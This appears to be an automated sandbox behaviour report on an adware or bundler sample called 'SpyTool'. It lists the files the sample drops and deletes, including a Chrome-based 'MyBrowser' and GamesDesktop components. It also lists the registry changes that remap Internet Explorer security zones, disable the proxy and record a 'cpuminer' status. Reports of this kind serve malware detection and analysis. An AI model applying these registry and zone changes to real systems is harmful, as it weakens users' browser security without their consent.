%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\icudtl.dat (76792 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\MyBrowser\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\metro_driver.dll (1765 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\ar.pak (293 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\am.pak (302 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\de.pak (224 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\gu.pak (1705 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\zh-TW.pak (190 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\PepperFlash\manifest.json (2 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\nb.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\nacl64.exe (12288 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\tr.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\ro.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\sk.pak (229 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\nacl_irt_x86_64.nexe (20507 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\libexif.dll (303 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\chrome_elf.dll (125 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\lv.pak (225 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\sl.pak (211 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\ml.pak (1826 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\pdf.dll (67091 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe (5873 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\sr.pak (1610 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\th.pak (1702 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Extensions\external_extensions.json (103 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\VisualElementsManifest.xml (392 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\ko.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\fi.pak (213 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\libegl.dll (204 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\te.pak (1761 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\kn.pak (1768 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\pt-PT.pak (222 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\chrome.7z (1161171 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\bn.pak (1731 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\uk.pak (1621 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\mr.pak (1708 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\wow_helper.exe (67 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\mybrowser.exe (3869 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\chrome_child.dll (261193 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\ffmpegsumo.dll (6337 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\ms.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\nl.pak (216 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin (4 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\en-GB.pak (189 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\VisualElements\smalllogo.png (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\da.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\delegate_execute.exe (12288 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\ja.pak (266 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\master_preferences (814 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\lt.pak (221 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\fil.pak (228 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\el.pak (1667 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\hu.pak (235 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\sv.pak (207 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\vi.pak (247 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\PepperFlash\pepflashplayer.dll (122658 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\es-419.pak (226 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\pl.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\libglesv2.dll (5442 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\VisualElements\splash-620x300.png (11 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\id.pak (202 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\ru.pak (1612 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\ta.pak (1784 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\hi.pak (1712 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\39.5.2171.95.manifest (222 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\chrome_100_percent.pak (7386 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\chrome.dll (237340 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\d3dcompiler_46.dll (22433 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\fr.pak (239 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\chrome_200_percent.pak (7972 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\fa.pak (308 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\es.pak (230 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\bg.pak (1640 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\en-US.pak (189 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\it.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\hr.pak (214 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\pt-BR.pak (217 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\cs.pak (223 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\ca.pak (227 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\sw.pak (208 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\et.pak (201 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\he.pak (253 bytes)
%Documents and Settings%\All Users\Desktop\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\resources.pak (121304 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\secondarytile.png (3 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\nacl_irt_x86_32.nexe (15801 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\VisualElements\logo.png (5 bytes)
The SpyTool deletes the following file(s):
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\prefs (0 bytes)
%Program Files%\MyBrowser\MyBrowser (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711 (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\wow_helper.exe (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\mybrowser.exe (0 bytes)
The process %original file name%.exe:396 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh5.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr4.tmp (7314 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsp1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
The process gmsd_re_005010095.exe:1336 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010095\gmsd_re_005010095\1.20\cnf.cyl (269 bytes)
The process nst1D.tmp:1520 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\6895.exe (14988 bytes)
The process nss2D.tmp:1436 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-JSNSO.tmp\nss2D.tmp (3781 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-JSNSO.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-JSNSO.tmp\nss2D.tmp (0 bytes)
The process nss2D.tmp:372 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Start Menu\Programs\GAMESDESKTOP\GamesDesktop.lnk (812 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\encrypt.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\is-02VBD.tmp (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\is-7FIQF.tmp (8657 bytes)
%Program Files%\gmsd_re_005010095\gamesdesktop_widget.exe (77005 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\_isetup\_shfoldr.dll (23 bytes)
%Program Files%\gmsd_re_005010095\is-FIG3R.tmp (22284 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010095\upgmsd_re_005010095.exe (23062 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\is-F0BR9.tmp (2105 bytes)
%Program Files%\gmsd_re_005010095\unins000.dat (29605 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\gamesdesktop_widget.7z (15278 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\is-P30K2.tmp (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\gmsd_re_005010095.7z (8657 bytes)
%Program Files%\gmsd_re_005010095\gmsd_re_005010095.exe (29430 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\predm.7z (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\ex.bat (1564 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp (4 bytes)
%Program Files%\gmsd_re_005010095\unins000.msg (375 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\is-JFB3K.tmp (15278 bytes)
%Program Files%\gmsd_re_005010095\predm.exe (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\upgmsd_re_005010095.7z (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\itdownload.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\CheckProc.cmd (288 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\gamesdesktop_widget.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\av.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\encrypt.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\predm.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\gmsd_re_005010095.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\upgmsd_re_005010095.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\gmsd_re_005010095.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\upgmsd_re_005010095.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\itdownload.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\_isetup (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\predm.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\ex.bat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\CheckProc.cmd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\gamesdesktop_widget.exe (0 bytes)
Registry activity
The process nsb27.tmp:1108 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc2B.tmp\registry.dll,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\InstallPath\Status]
"cpuminer" = "S"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "36 E0 59 87 62 99 58 F1 A6 84 1E B3 8A E4 55 30"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following registry key(s):
[HKCU\Software\InternetTurbo]
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process taskkill.exe:1824 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "94 1C F9 DC 6D 8B 47 0C 68 B5 21 15 85 A8 40 C6"
The process taskkill.exe:844 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA 7A F5 2F 49 C4 79 2A 5D BE D2 50 C3 E8 0F 2B"
The process taskkill.exe:2040 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 9D 17 4C 8F E2 6C 53 2A 58 3D 99 F1 C3 B7 92"
The process 6895.exe:928 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Tempo]
"(Default)" = "Tempo"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\CrossBrowser]
"Installation" = "1"
[HKCU\Software\Crossbrowse]
"Preinstall" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D9 C4 65 82 3A D1 D7 DE 93 F8 9C 2E 12 63 4A 58"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\4895]
"setup.exe" = "MyBrowser Installer"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following registry key(s):
[HKLM\SOFTWARE\Tempo]
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsjA.tmp:1028 makes changes in the system registry.
